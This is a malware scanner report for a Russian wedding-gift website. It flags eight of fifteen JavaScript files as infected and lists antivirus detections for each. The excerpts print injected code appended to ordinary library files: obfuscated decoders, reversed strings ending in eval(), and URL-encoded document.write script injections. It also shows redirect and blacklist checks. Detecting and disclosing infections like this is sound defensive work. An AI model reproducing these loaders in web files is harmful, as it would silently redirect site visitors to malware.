Malware Scanner report for svadba-podarok.ru

Malicious/Suspicious/Total urls checked: 8/0/15

8 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.svadba-podarok.ru/	200 OK Content-Length: 25005 Content-Type: text/html	clean
http://www.svadba-podarok.ru/media/system/js/caption.js	200 OK Content-Length: 11714 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = ... 10223 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: K7AntiVirus Riskware Comodo TrojWare.JS.Agent.TC F-Prot JS/IFrame.SJ.gen Norman ShellCode.V Commtouch JS/IFrame.SJ.gen
http://www.svadba-podarok.ru/templates/blueish/js/jquery-1.4.4.min.js	200 OK Content-Length: 88352 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof ... 91629 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: Comodo TrojWare.JS.Agent.TC F-Prot JS/IFrame.SJ.gen Sophos Troj/JSRedir-JN Commtouch JS/IFrame.SJ.gen
http://www.svadba-podarok.ru/templates/blueish/js/jqnoconflict.js	200 OK Content-Length: 9782 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var jq = jQuery.noConflict(); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%5 ... 8835 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Agent.JAB Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Exploit ( 04c553061 ) Emsisoft Trojan.JS.Agent.JAB (B) Comodo TrojWare.JS.Agent.TC K7GW Exploit ( 04c553061 ) McAfee-GW-Edition JS/Redirector.bp DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Agent.JAB Fortinet JS/Redirector.NJI!tr McAfee JS/Redirector.bp NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Agent.JAB VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Agent.JAB
http://www.svadba-podarok.ru/templates/blueish/js/lv_dropdown.js	200 OK Content-Length: 10115 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function mainmenu(){ jq(" .menu_lv_dropdown ul ").css({display: "none"}); jq(" .menu_lv_dropdown li").hover(function(){ jq(this).find('ul:first').css({visibility: "visible",display: "none"}).show(400); },function(){ jq(this).find('ul:first').css({visibility: "hidden"}); }); } jq(document).ready(function(){ mainmenu(); }); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72% ... 9196 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Ad-Aware Trojan.JS.Agent.JAB Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Exploit ( 04c553061 ) Comodo TrojWare.JS.Agent.TC Emsisoft Trojan.JS.Agent.JAB (B) K7GW Exploit ( 04c553061 ) McAfee-GW-Edition JS/Redirector.bp DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Agent.JAB Fortinet JS/Redirector.NJI!tr McAfee JS/Redirector.bp NANO-Antivirus Trojan.Script.Redirector.bqiube VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Agent.JAB
http://www.svadba-podarok.ru/templates/blueish/js/effects.js	200 OK Content-Length: 10668 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) jq(document).ready(function($){ jq('.contentheading,.componentheading,.breadcrumbs').hide('', function(){ }); jq('.contentheading,.componentheading,.breadcrumbs').fadeIn('slow', function(){ }); jq('a#gotop').click(function(){ jq('html, body').animate({ scrollTop: 0 }, 'slow'); }); < ... 9551 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Agent.JAB Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Exploit ( 04c553061 ) Emsisoft Trojan.JS.Agent.JAB (B) Comodo TrojWare.JS.Agent.TC K7GW Exploit ( 04c553061 ) McAfee-GW-Edition JS/Redirector.bp DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Agent.JAB McAfee JS/Redirector.bp NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Agent.JAB VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA BitDefender Trojan.JS.Agent.JAB
http://www.svadba-podarok.ru/plugins/system/rokbox/rokbox.js	200 OK Content-Length: 30027 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('R.5K({\'2M\':u(){H 8.1E(\'2u\',\'\')},\'25\':u(){H 8.1E(\'2u\',\'3I\')}});7m.5K({\'7l\':u(){l 6L=/^(1Y\|6o):\\/\\/([a-z-.0-9]+)[\\/]{0,1}/i.6r(E.3a);l 1q=/^(1Y\|6o):\ ... 29521 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: K7AntiVirus Riskware Comodo TrojWare.JS.Agent.TC F-Prot JS/IFrame.SJ.gen Norman ShellCode.V Commtouch JS/IFrame.SJ.gen
http://www.svadba-podarok.ru/plugins/system/rokbox/themes/mynxx/rokbox-config.js	200 OK Content-Length: 12437 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var rokbox; window.addEvent('domready', function() { rokbox = new RokBox({ 'theme': 'mynxx', 'transition': Fx.Transitions.Cubic.easeOut, 'duration': 500, 'chase': 80, 'frame-border': 34, 'content-padding': 0, 'arrows-height': 16, 'effect': 'growl', 'captions': 1, 'captionsDelay': 100, 'scrolling': 1, 'keyEvents': 1, 'overlay': { 'background': '#fff', 'opacity': 0.7, 'duration': 300, 'transition': Fx.Transitions.Quad.easeInOut }, 'def ... 9609 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Agent.JAB Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Exploit ( 04c553061 ) Emsisoft Trojan.JS.Agent.JAB (B) Comodo TrojWare.JS.Agent.TC K7GW Exploit ( 04c553061 ) McAfee-GW-Edition JS/Redirector.bp DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Agent.JAB Fortinet JS/Redirector.NJI!tr McAfee JS/Redirector.bp NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Agent.JAB VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Agent.JAB
http://pagead2.googlesyndication.com/pagead/show_ads.js	200 OK Content-Length: 19916 Content-Type: text/javascript	clean
http://www.svadba-podarok.ru/modules/mod_virtuemart_universal/files/mootools_tooltip.js	200 OK Content-Length: 10162 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function() { var Tips2 = new Tips($$('.mod_vm_universal a'), { maxTitleChars: 500, initialize:function(){ this.fx = new Fx.Style(this.toolTip, 'opacity', {duration: 400, wait: true}).set(0); }, onShow: function(toolTip) { this.fx.start(1); }, onHide: function(toolTip) { this.fx.start(0); } }); }); ;document.write(unescape("%3 ... 9273 bytes are skipped ...](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO))); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Agent.JAB Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Exploit ( 04c553061 ) Emsisoft Trojan.JS.Agent.JAB (B) Comodo TrojWare.JS.Agent.TC K7GW Exploit ( 04c553061 ) McAfee-GW-Edition JS/Redirector.bp DrWeb JS.Redirector.188 Microsoft Trojan:JS/Redirector.MK Kaspersky Trojan.JS.Redirector.zb MicroWorld-eScan Trojan.JS.Agent.JAB Fortinet JS/Redirector.NJI!tr McAfee JS/Redirector.bp NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Agent.JAB VIPRE Trojan.JS.Redirector.mk (v) F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA BitDefender Trojan.JS.Agent.JAB
http://pro100prazdnik.ru/necrom.php?id=gor_4	200 OK Content-Length: 4735 Content-Type: text/html	clean
http://pro100prazdnik.ru/wedding_dela/wedding_avto/105-kortezh.-svadebnaja-skazochnaja-kareta-ili.html	200 OK Content-Length: 55193 Content-Type: text/html	clean
http://pro100prazdnik.ru/engine/classes/js/jquery.js	200 OK Content-Length: 93868 Content-Type: application/x-javascript	clean
http://pro100prazdnik.ru/engine/classes/js/jqueryui.js	200 OK Content-Length: 65477 Content-Type: application/x-javascript	clean
http://pro100prazdnik.ru/engine/classes/js/dle_js.js	200 OK Content-Length: 20837 Content-Type: application/x-javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: svadba-podarok.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: svadba-podarok.ru
Referer: http://www.google.com/search?q=svadba-podarok.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=svadba-podarok.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://svadba-podarok.ru/

Result: svadba-podarok.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for svadba-podarok.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools